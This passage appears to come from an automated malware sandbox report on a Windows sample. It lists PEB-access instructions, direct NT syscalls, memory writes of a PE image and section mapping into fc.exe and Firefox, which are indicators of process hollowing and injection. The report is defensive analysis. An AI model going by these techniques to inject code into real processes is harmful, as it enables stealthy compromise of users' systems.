                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017329A0 mov eax, dword ptr fs:[00000030h]2_2_017329A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017209AD mov eax, dword ptr fs:[00000030h]2_2_017209AD
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017209AD mov eax, dword ptr fs:[00000030h]2_2_017209AD
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017AE872 mov eax, dword ptr fs:[00000030h]2_2_017AE872
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017AE872 mov eax, dword ptr fs:[00000030h]2_2_017AE872
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B6870 mov eax, dword ptr fs:[00000030h]2_2_017B6870
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B6870 mov eax, dword ptr fs:[00000030h]2_2_017B6870
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01750854 mov eax, dword ptr fs:[00000030h]2_2_01750854
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01724859 mov eax, dword ptr fs:[00000030h]2_2_01724859
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01724859 mov eax, dword ptr fs:[00000030h]2_2_01724859
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01732840 mov ecx, dword ptr fs:[00000030h]2_2_01732840
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01742835 mov eax, dword ptr fs:[00000030h]2_2_01742835
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01742835 mov eax, dword ptr fs:[00000030h]2_2_01742835
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01742835 mov eax, dword ptr fs:[00000030h]2_2_01742835
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01742835 mov ecx, dword ptr fs:[00000030h]2_2_01742835
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01742835 mov eax, dword ptr fs:[00000030h]2_2_01742835
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01742835 mov eax, dword ptr fs:[00000030h]2_2_01742835
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175A830 mov eax, dword ptr fs:[00000030h]2_2_0175A830
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C483A mov eax, dword ptr fs:[00000030h]2_2_017C483A
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C483A mov eax, dword ptr fs:[00000030h]2_2_017C483A
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017AC810 mov eax, dword ptr fs:[00000030h]2_2_017AC810
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175C8F9 mov eax, dword ptr fs:[00000030h]2_2_0175C8F9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175C8F9 mov eax, dword ptr fs:[00000030h]2_2_0175C8F9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EA8E4 mov eax, dword ptr fs:[00000030h]2_2_017EA8E4
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174E8C0 mov eax, dword ptr fs:[00000030h]2_2_0174E8C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F08C0 mov eax, dword ptr fs:[00000030h]2_2_017F08C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017AC89D mov eax, dword ptr fs:[00000030h]2_2_017AC89D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01720887 mov eax, dword ptr fs:[00000030h]2_2_01720887
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171CB7E mov eax, dword ptr fs:[00000030h]2_2_0171CB7E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F2B57 mov eax, dword ptr fs:[00000030h]2_2_017F2B57
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F2B57 mov eax, dword ptr fs:[00000030h]2_2_017F2B57
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F2B57 mov eax, dword ptr fs:[00000030h]2_2_017F2B57
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F2B57 mov eax, dword ptr fs:[00000030h]2_2_017F2B57
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CEB50 mov eax, dword ptr fs:[00000030h]2_2_017CEB50
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D4B4B mov eax, dword ptr fs:[00000030h]2_2_017D4B4B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D4B4B mov eax, dword ptr fs:[00000030h]2_2_017D4B4B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B6B40 mov eax, dword ptr fs:[00000030h]2_2_017B6B40
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B6B40 mov eax, dword ptr fs:[00000030h]2_2_017B6B40
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EAB40 mov eax, dword ptr fs:[00000030h]2_2_017EAB40
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C8B42 mov eax, dword ptr fs:[00000030h]2_2_017C8B42
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174EB20 mov eax, dword ptr fs:[00000030h]2_2_0174EB20
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174EB20 mov eax, dword ptr fs:[00000030h]2_2_0174EB20
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E8B28 mov eax, dword ptr fs:[00000030h]2_2_017E8B28
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E8B28 mov eax, dword ptr fs:[00000030h]2_2_017E8B28
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]2_2_0179EB1D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]2_2_0179EB1D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]2_2_0179EB1D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]2_2_0179EB1D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]2_2_0179EB1D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]2_2_0179EB1D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]2_2_0179EB1D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]2_2_0179EB1D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179EB1D mov eax, dword ptr fs:[00000030h]2_2_0179EB1D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F4B00 mov eax, dword ptr fs:[00000030h]2_2_017F4B00
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01728BF0 mov eax, dword ptr fs:[00000030h]2_2_01728BF0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01728BF0 mov eax, dword ptr fs:[00000030h]2_2_01728BF0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01728BF0 mov eax, dword ptr fs:[00000030h]2_2_01728BF0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174EBFC mov eax, dword ptr fs:[00000030h]2_2_0174EBFC
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017ACBF0 mov eax, dword ptr fs:[00000030h]2_2_017ACBF0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CEBD0 mov eax, dword ptr fs:[00000030h]2_2_017CEBD0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01740BCB mov eax, dword ptr fs:[00000030h]2_2_01740BCB
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01740BCB mov eax, dword ptr fs:[00000030h]2_2_01740BCB
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01740BCB mov eax, dword ptr fs:[00000030h]2_2_01740BCB
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01720BCD mov eax, dword ptr fs:[00000030h]2_2_01720BCD
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01720BCD mov eax, dword ptr fs:[00000030h]2_2_01720BCD
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01720BCD mov eax, dword ptr fs:[00000030h]2_2_01720BCD
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730BBE mov eax, dword ptr fs:[00000030h]2_2_01730BBE
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730BBE mov eax, dword ptr fs:[00000030h]2_2_01730BBE
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D4BB0 mov eax, dword ptr fs:[00000030h]2_2_017D4BB0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D4BB0 mov eax, dword ptr fs:[00000030h]2_2_017D4BB0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179CA72 mov eax, dword ptr fs:[00000030h]2_2_0179CA72
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179CA72 mov eax, dword ptr fs:[00000030h]2_2_0179CA72
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175CA6F mov eax, dword ptr fs:[00000030h]2_2_0175CA6F
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175CA6F mov eax, dword ptr fs:[00000030h]2_2_0175CA6F
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175CA6F mov eax, dword ptr fs:[00000030h]2_2_0175CA6F
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CEA60 mov eax, dword ptr fs:[00000030h]2_2_017CEA60
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01726A50 mov eax, dword ptr fs:[00000030h]2_2_01726A50
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01726A50 mov eax, dword ptr fs:[00000030h]2_2_01726A50
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01726A50 mov eax, dword ptr fs:[00000030h]2_2_01726A50
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01726A50 mov eax, dword ptr fs:[00000030h]2_2_01726A50
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01726A50 mov eax, dword ptr fs:[00000030h]2_2_01726A50
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01726A50 mov eax, dword ptr fs:[00000030h]2_2_01726A50
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01726A50 mov eax, dword ptr fs:[00000030h]2_2_01726A50
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730A5B mov eax, dword ptr fs:[00000030h]2_2_01730A5B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730A5B mov eax, dword ptr fs:[00000030h]2_2_01730A5B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01744A35 mov eax, dword ptr fs:[00000030h]2_2_01744A35
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01744A35 mov eax, dword ptr fs:[00000030h]2_2_01744A35
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175CA24 mov eax, dword ptr fs:[00000030h]2_2_0175CA24
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174EA2E mov eax, dword ptr fs:[00000030h]2_2_0174EA2E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017ACA11 mov eax, dword ptr fs:[00000030h]2_2_017ACA11
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175AAEE mov eax, dword ptr fs:[00000030h]2_2_0175AAEE
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01720AD0 mov eax, dword ptr fs:[00000030h]2_2_01720AD0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01754AD0 mov eax, dword ptr fs:[00000030h]2_2_01754AD0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01776ACC mov eax, dword ptr fs:[00000030h]2_2_01776ACC
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01728AA0 mov eax, dword ptr fs:[00000030h]2_2_01728AA0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01776AA4 mov eax, dword ptr fs:[00000030h]2_2_01776AA4
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01758A90 mov edx, dword ptr fs:[00000030h]2_2_01758A90
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172EA80 mov eax, dword ptr fs:[00000030h]2_2_0172EA80
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F4A80 mov eax, dword ptr fs:[00000030h]2_2_017F4A80
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtTerminateThread: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeMemory written: C:\Users\user\Desktop\SDBARVe3d3.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: NULL target: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeSection loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeThread register set: target process: 2916Jump to behavior
                Source: C:\Windows\SysWOW64\fc.exeThread APC queued: target process: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess created: C:\Users\user\Desktop\SDBARVe3d3.exe "C:\Users\user\Desktop\SDBARVe3d3.exe"Jump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: wPGxKDFwovcH.exe, 00000006.00000000.1973380170.0000000001851000.00000002.00000001.00040000.00000000.sdmp, wPGxKDFwovcH.exe, 00000006.00000002.4134343556.0000000001850000.00000002.00000001.00040000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000000.2129425671.0000000001221000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: wPGxKDFwovcH.exe, 00000006.00000000.1973380170.0000000001851000.00000002.00000001.00040000.00000000.sdmp, wPGxKDFwovcH.exe, 00000006.00000002.4134343556.0000000001850000.00000002.00000001.00040000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000000.2129425671.0000000001221000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: wPGxKDFwovcH.exe, 00000006.00000000.1973380170.0000000001851000.00000002.00000001.00040000.00000000.sdmp, wPGxKDFwovcH.exe, 00000006.00000002.4134343556.0000000001850000.00000002.00000001.00040000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000000.2129425671.0000000001221000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: wPGxKDFwovcH.exe, 00000006.00000000.1973380170.0000000001851000.00000002.00000001.00040000.00000000.sdmp, wPGxKDFwovcH.exe, 00000006.00000002.4134343556.0000000001850000.00000002.00000001.00040000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000000.2129425671.0000000001221000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Users\user\Desktop\SDBARVe3d3.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
